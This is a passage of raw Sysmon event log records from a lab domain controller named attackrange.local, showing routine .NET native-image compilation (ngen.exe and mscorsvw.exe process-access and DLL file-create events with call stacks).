EM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:53.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923D-6005-2C04-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.601{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923D-6005-2C04-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:53.601{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923D-6005-2C04-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:53.492{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1274-0\System.Data.SqlXml.dll2021-01-18 13:50:53.492 10341000x80000000000000008477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:54.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.820{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:54.820{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:54.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923E-6005-2E04-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.430{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923E-6005-2E04-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:54.430{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923E-6005-2E04-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:54.336{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\127c-0\System.Deployment.dll2021-01-18 13:50:54.336 10341000x80000000000000008484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:58.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.867{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:58.867{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:58.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9242-6005-3004-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.820{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9242-6005-3004-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:58.820{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9242-6005-3004-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:58.523{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fe0-0\System.Design.dll2021-01-18 13:50:58.523 11241100x80000000000000008499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:50:59.976{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c50-0\System.DirectoryServices.Protocols.dll2021-01-18 13:50:59.976 10341000x80000000000000008498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.757{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.757{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.757{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3404-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:59.695{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9243-6005-3404-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9243-6005-3404-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:59.617{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9d4-0\System.DirectoryServices.AccountManagement.dll2021-01-18 13:50:59.617 10341000x80000000000000008491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:59.242{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9243-6005-3304-00000000A301}2516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERN